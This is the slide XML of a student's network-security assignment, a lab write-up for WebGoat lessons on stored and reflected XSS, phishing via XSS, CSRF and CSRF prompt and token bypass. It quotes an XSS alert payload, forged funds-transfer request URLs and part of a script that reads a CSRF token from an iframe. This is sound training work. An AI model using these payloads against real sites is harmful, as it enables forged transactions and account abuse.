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28" r:id="rId37"/>
    <p:sldId id="329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30" r:id="rId73"/>
    <p:sldId id="331" r:id="rId7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4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7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4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5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8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5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8EE1-2BA2-46B3-A149-DE4B8639FB8F}" type="datetimeFigureOut">
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>2017.09.25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D9E7-88CD-4BEB-8EBB-99DA4E60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보안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51" y="463138"/>
            <a:ext cx="9175351" cy="59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7196" y="470987"/>
            <a:ext cx="9174172" cy="173387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Network Security Assignment #1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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Webgoa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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Kozuka Gothic Pr6N L" pitchFamily="34" charset="-128"/>
                <a:ea typeface="Kozuka Gothic Pr6N L" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>t</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="3600" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="20000"/>
                  <a:lumOff val="80000"/>
                </a:schemeClr>
              </a:solidFill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1351" y="0"/>
            <a:ext cx="9173241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16216" y="515719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20150291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소프트웨어학부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하현수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3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804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1 : Stored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Alert </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>명령어가 실행되며</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>XSS Activated</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>라는 경고문이 출력됩니다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Jerry</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>로 로그인하더라도</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>, Tom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>의 정보를 보면 공격의 영향을 받는다는 것을 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>증명하였습니다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Stage 1 Complete.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0" y="1693952"/>
            <a:ext cx="5592291" cy="409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51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2 : Block Stored XSS Using Input Validation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LESSON ONLY WORKS WITH THE DEVELOPER VERSION OF WEBGOAT.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>이라</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>메시지가 있으면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Skip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>하고 다음 문제로 넘어가라고 하셔서 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>Skip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5" y="1700808"/>
            <a:ext cx="5107093" cy="390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704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3 : Stored XSS Revisited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전에 만들어 두었던 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>XSS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>어택이 여전히 작동하는지 증명하라고 하는 문제입니다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Stage2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연계된거</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> 같은데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우</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>선 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>David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ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>이</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>미 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>작성된 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>Bruce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r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>XSS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>공격에 영향을 받는지 증명해보라고 하니 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>David</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>로 로그인합니다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5587543" cy="363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704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3 : Stored XSS Revisited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Bruce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XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>공격에 영향을 받는지 증명하라고 했으니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Stage1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>과 동일한 방법으로</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>Bruce</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>의 프로필을</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1" smtClean="0"/>
              <a:t>ViewProfile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>을 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>클릭하여 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>접근해봅니다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60" y="1879872"/>
            <a:ext cx="46482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2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704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3 : Stored XSS Revisited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알수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경고창이</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> 뜨며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XSS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실행됬다는</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> 것을 짐작할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David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Bruce</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>의 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>프로필에 작성된 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>공격에 영향을 받는다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>사실을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Stage 3 Complete.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5372645" cy="393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1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59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4 : Block Stored XSS Using Output Encoding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LESSON ONLY WORKS WITH THE DEVELOPER VERSION OF WEBGOAT.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>이라</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>메시지가 있으면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Skip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>하고 다음 문제로 넘어가라고 하셔서 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>Skip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18682"/>
            <a:ext cx="5201496" cy="32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1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377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5 : Reflected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Reflected XSS Attack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>을 실행하라는 문제입니다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Search Staff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>에 스크립트 코드를 넣어 다른 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>employee</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>도 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>공격</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>에 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>영향을 받는지 증명하겠습니다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우선 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>Larry</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>의 아이디로 접속합니다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00225"/>
            <a:ext cx="504056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9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377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5 : Reflected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 Staff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>를 누르자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입력창</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" err="1"/>
              <a:t>이</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>나타납니다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입력창에</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> 스크립트 코드</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>&lt;script&gt;alert('XSS Activated');&lt;/script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넣</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>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FindProfile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>버튼을 눌러보겠습니다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57136"/>
            <a:ext cx="4438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377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5 : Reflected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XSS Activated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메시지가 출력됩니다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XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>가 실행되었다는 것을 확인 할 수 있었습니다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Stage 5 Complete.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5306432" cy="35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1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59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6 : Block Stored XSS Using Output Encoding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0260" y="2323039"/>
            <a:ext cx="3174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LESSON ONLY WORKS WITH THE DEVELOPER VERSION OF WEBGOAT.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>이라</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>메시지가 있으면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Skip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>하고 다음 문제로 넘어가라고 하셔서 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>Skip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6" y="1844824"/>
            <a:ext cx="5598334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9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Phishing With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3695"/>
            <a:ext cx="71056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44522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검색창을</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>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코드를 작성하고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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>를 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>이용하여 사용자의 로그인과 패스워드를 받는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>피싱</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> 스크립트를 실행시킨다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6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620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Cross Site Request Forgery(CSRF)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8998" y="2323039"/>
            <a:ext cx="3475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Newsgroup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>에게 보낼 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>이메일에서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transferFunds</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>라는 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>Parameter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>를 통해 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>5000</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>과 같은 정수를 삽입한 요청을 강제로 하게끔 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>만드는것이</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> 목적인 문제입니다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2" y="1484784"/>
            <a:ext cx="51845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8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620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Cross Site Request Forgery(CSRF)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8998" y="2323039"/>
            <a:ext cx="3475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제목을 자극적이게</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>v</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>ery important</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>로 해두고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내용에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를 통하여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강제로 해당 주소로 요청하는 스크립트 코드를 입력합니다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transferFunds</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t> = 5000</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>을 넣어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문제의 조건과 동일하게 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>일치시킨뒤</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>, submit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>을 클릭합니다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0" y="2060848"/>
            <a:ext cx="5472608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0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620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Cross Site Request Forgery(CSRF)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8998" y="2323039"/>
            <a:ext cx="3475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후</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>, very important</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>라는 제목의 메일을 클릭하면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Congratulation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>이라는 메시지가 뜨며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메뉴에서 초록색 체크 박스가 나타납니다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를 통한 요청이 성공적으로 실행되었다는 것을 의미합니</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>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CSRF Complete.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94287"/>
            <a:ext cx="4502352" cy="419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301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CSRF Prompt By-Pass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69382" y="1700808"/>
            <a:ext cx="3161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CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>와 동일한 방식으로 진행되지만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 차이점은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처음</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>에 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1" smtClean="0"/>
              <a:t>transferFunds</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t> = 5000 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>값을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후에 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1" smtClean="0"/>
              <a:t>transferFunds</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>=CONFIRM</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>이라는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>컨펌</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> 요청을 다시 해주는 문제입니다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간단히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를 한번 더 입력하여 해결해보겠습니다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8537"/>
            <a:ext cx="5112568" cy="465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4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301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CSRF Prompt By-Pass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69382" y="1700808"/>
            <a:ext cx="3161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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>attack?Screen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>=1471017872&amp;menu=900&amp;transferFunds=5000'&gt;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='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>attack?Screen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>=1471017872&amp;menu=900&amp;transferFunds=CONFIRM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>'&gt;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두가지의</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> 스크립트 코드를 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>입력한뒤</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>, submit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>을 누릅니다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8452"/>
            <a:ext cx="522983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301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CSRF Prompt By-Pass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69382" y="1700808"/>
            <a:ext cx="3161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Submit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>된 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>very important </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>메일을 열자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Congratulation </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>메시지와 함께 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>메뉴바에서</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> 초록색 체크 박스가 나타납니다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성공적으</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>로 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>컨펌</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> 요청까지 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>실행됬다는</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> 증거입니다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CSRF Prompt By-Pass Complete.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84" y="1700808"/>
            <a:ext cx="5643297" cy="400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0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099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CSRF Token By-Pass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69382" y="1700808"/>
            <a:ext cx="3161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CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>와 동일한 형태로 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>요청</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>을 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>하되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Token</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>값을 자동으로 불러와 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>Token</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>을 포함한 요청을 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>하는것</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" err="1"/>
              <a:t>을</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>목표로 하는 문제이다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토큰값을</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> 얻을 수 있는 페이지를 연후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 값을 불러오는 스크립트가 필요하다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65" y="1484784"/>
            <a:ext cx="529054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6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099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CSRF Token By-Pass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56176" y="1700808"/>
            <a:ext cx="2774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Your Order List</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>라는</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>자극적</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>인 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>제목으로 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>클릭</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>을 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>유도한 후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스크립</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>트 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>코드를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스크립트 코드는 다음 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>페이지</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>에 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>기재하였다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" y="1484784"/>
            <a:ext cx="598357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9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099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CSRF Token By-Pass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2087" y="1349286"/>
            <a:ext cx="85356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&lt;script language = "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tokensuffix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function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>readFrame1()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frameDoc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("frame1").</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>contentDocument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form = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>frameDoc.getElementsByTagName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>("form")[0];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tokensuffix</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> = '&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>CSRFToken</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>=' + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>form.CSRFToken.value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loadFrame2();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>}//Frame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값을 불러오는 함수이다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function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>loadFrame2()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testFrame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("frame2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>");    </a:t>
